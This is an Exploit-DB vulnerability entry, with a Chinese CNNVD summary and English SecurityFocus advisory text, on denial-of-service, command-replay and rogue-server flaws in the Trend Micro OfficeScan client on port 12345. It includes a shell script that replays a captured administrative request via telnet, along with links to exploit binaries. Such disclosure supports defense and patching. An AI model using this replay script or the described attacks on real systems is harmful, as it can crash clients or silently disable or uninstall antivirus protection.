https://www.exploit-db.com/exploits/19780
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-082

TrendMicroOfficeScan是美国趋势科技（TrendMicro）公司的一套分布式反病毒软件。安装过程中会提示是否采用WEB管理方式。如果选择采用WEB管理方式，OfficeScan客户端将侦听12345/TCP端口，用于定期接收病毒数据库更新或者来自OfficeScan管理端的命令。远程攻击者有好几种办法对TrendMicroOfficeScan进行拒绝服务攻击。向12345/TCP发送随机数据，tmlisten.exe的CPU占用率将高达100%，并引发一个VisualC++错误，最终导致机器崩溃。向12345/TCP发送随机数据的同时，打开5个以上到该端口的TCP连接，该端口上的服务将停止响应。必须重启服务才能恢复正常。同一网段的用户可能利用Sniffer捕捉管理命令，修改后重新发往客户端，这些请求的最后两个字节意义如下:04:远程卸载OfficeScan客户端06:开始扫描07:停止扫描OfficeScan客户端向OfficeScan管理端提交URL请求，获取一些配置信息。如果攻击者伪造了一台有效的OfficeScan管理端服务器，就可能更改OfficeScan客户端扫描策略，比如只扫描.txt文件，不扫描软盘、光盘，指示OfficeScan客户端将被感染文件移动到别的位置。

source: http://www.securityfocus.com/bid/1013/info

Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. 

There are several ways for an attacker to cause various denial of service conditions.

Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine.

Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine.

It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345.

It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including:

04: full uninstallation of the OfficeScan client
06: launch a scan
07: stop a scan

The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour.

If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned, (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine.

It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks.

cgiRqCfg.exe provides to the client configuration settings which will disable scanning on all removable, fixed, and CDrom drives, and further will disable scanning for all files except those with the extension "YES IT's P0SS1bl3!"

cgiOnStart.exe will need to be put on the attacking webserver as the client expects it.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-1.exe

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-2.exe

this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response.

#!/bin/sh
(
sleep 2
echo "GET/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906HTTP/1.0"
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt

Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef <[email protected]>. This tool is a pre-compiled Windows binary with Visual Basic source.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-3.zip

来源:BUGTRAQ
名称:20000315TrendMicroreleasepatchfor”OfficeScanDoS&MessageReplay;”Vulnerabilies
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;=D129BBE1730AD2118A0300805FC1C2FE038AF28B@209-76-212-10.trendmicro.com
来源:BID
名称:1013
链接:http://www.securityfocus.com/bid/1013
来源:BUGTRAQ
名称:20000226DOSinTrendmicroOfficeScan
链接:http://archives.neohapsis.com/archives/bugtraq/2000-02/0340.html
来源:www.antivirus.com
链接:http://www.antivirus.com/download/ofce_patch_35.htm
来源：NSFOCUS
名称：347
链接：http://www.nsfocus.net/vulndb/347